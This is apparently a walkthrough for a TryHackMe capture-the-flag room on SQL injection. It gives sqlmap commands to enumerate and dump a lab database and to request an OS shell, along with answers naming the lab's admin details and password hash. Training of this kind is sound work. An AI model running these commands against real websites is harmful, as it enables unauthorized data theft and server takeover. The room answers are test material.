Secuneus Room : TryHackme
Join Room : https://tryhackme.com/jr/secuneusctf
Introduction:- SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access.
In some situations, an attacker can escalate a SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack.
A successful SQL injection attack can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information. Many high-profile data breaches in recent years have been the result of SQL injection attacks, leading to reputational damage and regulatory fines. In some cases, an attacker can obtain a persistent backdoor into an organization’s systems, leading to a long-term compromise that can go unnoticed for an extended period
1. Connection:- First we have to connect to the machine through the openvpn. Download the configuration file of the openvpn using following steps.
i) To download the file go to the access after clicking your profile logo of Tryhackme.
ii) After clicking on Access first check that you are not connected to other machine. If you are not connected through openvpn then download the configuration file.
iii) After downloading the configuration file open your kali linux in your virtual machine and copy the configuration file in your kali linux then open the terminal and run the following commands to connect to the machine.
- First go to the directory in which you copy the configuration file using the cd command and list the file in the directory using ls command.
Command used: cd , ls
- Then run the configuration file using command “sudo openvpn [File name]”. And check that the initialization sequence is completed or not if it is not completed then you are not connected and if it completed then you are connected.
Command used: sudo openvpn file name
After successfully connected with the machine you have to start the machine by clicking on the start machine and after clicking on the machine you have the target machine ip address.
2. Sqlmap:- Sqlmap is arguably the most popular automated SQL injection tool out there. It checks for various types of injections, and has plenty of customization options.
Question 1:- How do you specify which url to check?
Answer:- sqlmap -u url of the website –dbs
In this command -u is used to specify the url which is checked by sqlmap. So the answer will be ‘-u’.
Question 2:- How do you select which parameter to use?
Answer:- In this command the ‘-p ‘ is used to select the parameter specified by the user from the specified web application.
Question 3:- How do you dump the table entries of the database?
Answer:- sqlmap –u url of the website –D database name –T table name –C column name –dump
In this command the ‘–dump ‘ is used to get all the data specified by the user from the specified database, table and column.
Question 4:- Which flag sets which db to enumerate?
Answer:- sqlmap –u url of the website –D database name
In this command –D is used to know the database which is used to be enumerate.
Question 5:- Which flag sets which table to enumerate?
Answer:- sqlmap –u url of the website –D database name –T table name.
In this command –T is used to know the table in the database which is used to be enumerate.
Question 6:- Which flag sets which column to enumerate?
Answer:- sqlmap –u url of the website –D database name –T table name –C column name.
In this command –C is used to know the column in the table in the database which is used to be enumerate.
Question 7:- How do you ask sqlmap to try to get an interactive os-shell?
Answer:- –os-shell is used to get an interactive os shell in the sqlmap tool.
Question 8:- Which flag whould you use to Never ask for user input, use the default behavior?
Answer:- sqlmap –u url of the website –dbs –batch
In this command –batch is used to never ask for user input . With the use of batch the sqlmap uses the default behavior.
Question 9:- During performing the post parameter sql injection with burpsuite. Which parameter is detecting the sql injection vulnerability?
Answer:- First set the machine ip in the url and search for the post parameter request in the machine. Now search any word in that post parameter, and capture the request in the burpsuite. Send this request to the repeater and write asteric sign(*) in the end of the vulnerable parameter.
Save the request in the text file. In this machine the search bar “searchifsccode” is a vulnerable parameter in the machine.
Question 10:- What is the name of the database?
Answer:- To search the name of the database of the machine run the following command. So the name of the database containing the information is ‘ifscdb’.
Sqlmap –r path of the file –p ‘parameter’ –dbs –batch
Question 11:- How many tables are in the database?
Answer:- To count the tables we have to first search the tables inside the database. Use the following command to search the tables.
Sqlmap –r path of the file –p ‘parameter’ –D ifscdb –tables –batch
So there are total 6 tables in the database.
Question 12:- How many columns are in the database?
Answer:- To count the columns we have to first search the columns inside the tables. Use the following command to search the columns.
Sqlmap –r path of the file –p ‘parameter’ –D ifscdb –T tbladmin –columns –batch
So there are total 8 columns inside the table tbladmin.
Question 13:- Which table would you use to retrive the admin detail ?
Answer:- We use the table ‘tbladmin’ to retrieve the details of the admin from the database.
Question 14:- What is username of Administrative account?
Answer:- The username of the admin is “admin”.
Question 15:- What is the email id of admin ?
Answer:- The email idof the admin is [email protected].
Question 16:- What is the mobile number of Admin?
Answer:- The mobile number of the admin is “5689784592”.
Question 17:- What is the encrypted password of Administrative account?
Answer:- The encrypted password of the Administrative account is “f925916e2754e5e03f75dd58a5733251”.